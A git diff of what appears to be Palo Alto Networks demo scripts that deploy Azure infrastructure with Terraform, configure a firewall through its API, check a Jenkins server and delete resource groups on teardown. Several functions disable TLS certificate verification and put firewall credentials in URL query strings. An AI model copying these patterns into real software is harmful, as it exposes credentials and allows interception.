+ :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + """ # Set run_plan to TRUE is you wish to run terraform plan before apply run_plan = False kwargs = {"auto-approve": True} @@ -462,40 +528,77 @@ def main(username, password, rg_name): # if capture output is False, then everything will essentially go to stdout and stderrf stderr = sys.stderr stdout = sys.stdout - start_time = time.asctime() - print(f'Starting Deployment at {start_time}\n') + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) # Create Bootstrap - tf = Terraform(working_dir='./WebInBootstrap') + tf = Terraform(working_dir=working_dir) tf.cmd('init') if run_plan: + # print('Calling tf.plan') tf.plan(capture_output=False) - return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, - skip_plan=True, **kwargs) - resource_group = tf.output('Resource_Group') - bootstrap_bucket = tf.output('Bootstrap_Bucket') - storage_account_access_key = tf.output('Storage_Account_Access_Key') - web_in_bootstrap_output = tf.output() + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + return (return_code, outputs) - update_status('web_in_deploy_stdout', stdout) - update_status('web_in_bootstrap_output', web_in_bootstrap_output) - if return_code1 != 0: +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: logger.info("WebInBootstrap failed") update_status('web_in_bootstap_status', 'error') - update_status('web_in_bootstrap_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_bootstrap_status', 'success') - share_prefix = 'jenkins-demo' share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) @@ -505,46 +608,40 @@ def main(username, password, rg_name): WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + # # Build Infrastructure + # + # - tf = 
Terraform(working_dir='./WebInDeploy') - # print("vars {}".format(WebInDeploy_vars)) - tf.cmd('init') - if run_plan: - # print('Calling tf.plan') - tf.plan(capture_output=False, var=WebInDeploy_vars) - return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, - **kwargs) + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') - web_in_deploy_output = tf.output() + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) - update_status('web_in_deploy_stdout', stdout) update_status('web_in_deploy_output', web_in_deploy_output) - if return_code1 != 0: + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: logger.info("WebInDeploy failed") update_status('web_in_deploy_status', 'error') - update_status('web_in_deploy_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_deploy_status', 'success') - - albDns = tf.output('ALB-DNS') - fwMgt = tf.output('MGT-IP-FW-1') - nlbDns = tf.output('NLB-DNS') - fwMgtIP = tf.output('MGT-IP-FW-1') - - logger.info("Got these values from output \n\n") - logger.info("AppGateway address is {}".format(albDns)) - logger.info("Internal loadbalancer address is {}".format(nlbDns)) - logger.info("Firewall Mgt address is {}".format(fwMgt)) # # Check firewall is up and running - # # + # + # api_key = getApiKey(fwMgtIP, username, password) @@ -577,45 +674,29 @@ def main(username, password, rg_name): logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') time.sleep(10) fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) - logger.info("Updating firewall with latest content pack") + + logger.info("Updating firewall with latest content pack") update_fw(fwMgtIP, api_key) # # Configure Firewall # WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) - tf = Terraform(working_dir='./WebInFWConf') - tf.cmd('init') - kwargs = {"auto-approve": True} logger.info("Applying addtional config to firewall") - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt - - if run_plan: - tf.plan(capture_output=capture_output, var=WebInFWConf_vars) - - # update initial vars with generated fwMgt ip - - return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=WebInFWConf_vars, **kwargs) - - web_in_fw_conf_out = tf.output() + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') - update_status('web_in_fw_conf_output', web_in_fw_conf_out) - # update_status('web_in_fw_conf_stdout', stdout) + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf ok") - logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) - - if return_code2 != 0: - logger.error("WebInFWConf failed") - update_status('web_in_fw_conf_status', 'error') - update_status('web_in_fw_conf_stderr', stderr) + else: + 
logger.info("WebInFWConf sent return code {}".format(return_code)) + update_status('web_in_deploy_status', 'error') print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_fw_conf_status', 'success') logger.info("Commit changes to firewall") @@ -630,8 +711,6 @@ def main(username, password, rg_name): logger.info('Checking if Jenkins Server is ready') - # FIXME - add outputs for all 3 dirs - res = getServerStatus(albDns) if res == 'server_up': @@ -651,10 +730,12 @@ def main(username, password, rg_name): parser.add_argument('-u', '--username', help='Firewall Username', required=True) parser.add_argument('-p', '--password', help='Firewall Password', required=True) parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) args = parser.parse_args() username = args.username password = args.password resource_group = args.resource_group + azure_region = args.azure_region - main(username, password, resource_group) + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-master/deployold.py b/azure/Jenkins_proj-master/deployold.py new file mode 100644 index 00000000..b2ddb37e --- /dev/null +++ b/azure/Jenkins_proj-master/deployold.py @@ -0,0 +1,628 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict + +import requests +import urllib3 +from azure.common import AzureException +from azure.storage.file import FileService +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + +# from . 
import cache_utils +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def listRecursive (d, key): + for k, v in d.items (): + if isinstance (v, OrderedDict): + for found in listRecursive (v, key): + yield found + if k == key: + yield v + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. 
Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? 
+ except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + # generate a unique share name to avoid overlaps in shared infra + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. 
May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, rg_name, azure_region): + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Create Bootstrap + + tf = Terraform(working_dir='./WebInBootstrap') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, + skip_plan=True, **kwargs) + + resource_group = tf.output('Resource_Group') + bootstrap_bucket = tf.output('Bootstrap_Bucket') + storage_account_access_key = tf.output('Storage_Account_Access_Key') + web_in_bootstrap_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_bootstrap_output', web_in_bootstrap_output) + + if return_code1 != 0: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + update_status('web_in_bootstrap_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_bootstrap_status', 'success') + + share_prefix = 'jenkins-demo' + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + 
WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + # print("vars {}".format(WebInDeploy_vars)) + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = tf.output('MGT-IP-FW-1') + + logger.info("Got these values from output \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebInFWConf failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + 
logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-master/destroy-old.py b/azure/Jenkins_proj-master/destroy-old.py new file mode 100644 index 00000000..305e8925 --- /dev/null +++ b/azure/Jenkins_proj-master/destroy-old.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
+ +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + WebInBootstrap_vars.update({'RG_Name': rg_name}) + WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) + + tf = Terraform(working_dir='./WebInBootstrap') + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("WebInBootstrap destroyed") + deployment_status = {'WebInDeploy': 'Fail'} + + exit() + else: + deployment_status = {'WebInDeploy': 'Success'} + exit() + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/azure/Jenkins_proj-master/destroy.py b/azure/Jenkins_proj-master/destroy.py index 305e8925..3bc6b81b 100644 --- a/azure/Jenkins_proj-master/destroy.py +++ b/azure/Jenkins_proj-master/destroy.py @@ -1,121 +1,125 @@ -#!/usr/bin/env python3 -""" -# Copyright (c) 2018, Palo Alto Networks -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -# Author: Justin Harris jharris@paloaltonetworks.com - -Usage: -git -python destroy.py - -""" +from azure.cli.core import get_default_cli +import sys +import tempfile import argparse import logging +import subprocess +import os from python_terraform import Terraform logger = logging.getLogger() -handler = logging.StreamHandler() -formatter = logging.Formatter('%(levelname)-8s %(message)s') -handler.setFormatter(formatter) -logger.addHandler(handler) +# handler = logging.StreamHandler() +# formatter = logging.Formatter('%(levelname)-8s %(message)s') +# handler.setFormatter(formatter) +# logger.addHandler(handler) logger.setLevel(logging.INFO) -def main(username, password): - username = username - password = password +# +# Usage azure_login.py -g rgname +# - WebInDeploy_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +sys.sterr = sys.stdout - WebInBootstrap_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +print('Logging in to Azure using device code') - albDns = '' - nlbDns = '' - fwMgt = '' +def run_cmd(cmd): + subprocess.call('az login', shell=True) + res = subprocess.call(cmd, shell=True) + print ('Result is {}'.format(res)) - # Set run_plan to TRUE is you wish to run terraform plan before apply - run_plan = False - deployment_status = {} - kwargs = {"auto-approve": True} +def delete_file(fpath): + if os.path.exists(fpath): + try: + os.remove(fpath) + print ('Removed state file {}'.format(fpath)) + except Exception as e: + print ('Unable to delete the file {} got error {}'.format(fpath, e)) + else: + print('No need to delete {} as it no longer exists'.format(fpath)) + +def az_cli(args_str): + temp = tempfile.TemporaryFile() + args = args_str.split() + logger.debug('Sending cli command {}'.format(args)) + code = get_default_cli().invoke(args, None, temp) + # temp.seek(0) + data = temp.read().strip() + temp.close() + return [code, data] + +def delete_rg(rg_name): + logger.info('Deleting resource group {}'.format(rg_name)) + cmd = 'group delete --name ' + rg_name + ' --yes' + code, data = az_cli(cmd) + if code == 0: + print ('Successfully deleted Rg {} {}'.format(code,rg_name)) + +def delete_state_files(working_dir, file_list): + """ + + :param working_dir: string + :param tfstate_files: list of files + :return: True or False + + Removes a list of files from a directory + + """ + for file_name in file_list: + fpath = working_dir + file_name + if os.path.exists(fpath): + delete_file(fpath) + else: + print('Already deleted file {}'.format(fpath)) + +def main (username, password): + #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) # # Destroy Infrastructure # - tf = Terraform(working_dir='./WebInDeploy') - rg_name = tf.output('RG_Name') - - attack_rg_name = tf.output('Attacker_RG_Name') - logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) - - WebInDeploy_vars.update({'RG_Name': 